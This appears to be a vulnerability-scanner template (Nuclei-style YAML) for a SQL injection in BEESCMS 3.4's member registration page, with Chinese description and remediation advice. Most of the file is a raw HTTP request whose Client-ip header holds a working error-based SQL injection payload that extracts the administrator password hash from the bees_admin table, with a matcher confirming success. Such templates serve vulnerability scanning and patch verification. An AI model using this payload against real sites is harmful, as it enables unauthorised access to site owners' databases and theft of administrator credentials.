id: beescms-v3-member-sqli
info:
  name: beescms 3.4 member.php sql注入漏洞
  author:
  - jim2g
  description: |-
    beescms 3.4 member.php sql注入漏洞
    BEESCMS是一套基于PHP和MySQL的可扩展的内容管理系统（CMS）。

    BEESCMS后台member.php页面存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
  severity: high
  remediation: |
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：
    http://www.beescms.com/
    临时修复方案：
    1、使用预编译语句，使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
    2、对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
    3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
    4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
    5、网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
    6、严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
    7、避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
    8、过滤危险字符，例如：采用正则表达式匹配union、sleep、and、select、load_file等关键字，如果匹配到则终止运行。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,"c4ca4238a0b923820dcc509a6f75849b")
  raw:
  - |
    POST /member/member.php?action=save_reg HTTP/1.1
    Host: {{Hostname}}
    Client-ip: 1.1.1.1' AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(md5(1),0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#
    Content-Type: multipart/form-data; boundary=---------------------------47891759416863
    Content-Length: 979
    Referer: http://59bda5eb-4f08-426e-8c88-8a7cd0940598.vulndocker.seclover.com/member/member.php?action=regist&lang=cn
    Cookie: UM_distinctid=1601f8fc496190-04cf93b566ed16-4c322f7c-1fa400-1601f8fc49720d; PHPSESSID=ccubndqveu4ke3emslqe0selk6
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------47891759416863
    Content-Disposition: form-data; name="user"

    bugscan222
    -----------------------------47891759416863
    Content-Disposition: form-data; name="nich"

    bugscan222
    -----------------------------47891759416863
    Content-Disposition: form-data; name="password"

    bugscan123
    -----------------------------47891759416863
    Content-Disposition: form-data; name="password2"

    bugscan123
    -----------------------------47891759416863
    Content-Disposition: form-data; name="mail"

    bugscan@bugscan.net
    -----------------------------47891759416863
    Content-Disposition: form-data; name="code"

    ae14
    -----------------------------47891759416863
    Content-Disposition: form-data; name="lang"

    cn
    -----------------------------47891759416863
    Content-Disposition: form-data; name="submit.x"

    42
    -----------------------------47891759416863
    Content-Disposition: form-data; name="submit.y"

    31
    -----------------------------47891759416863--
  req-condition: true
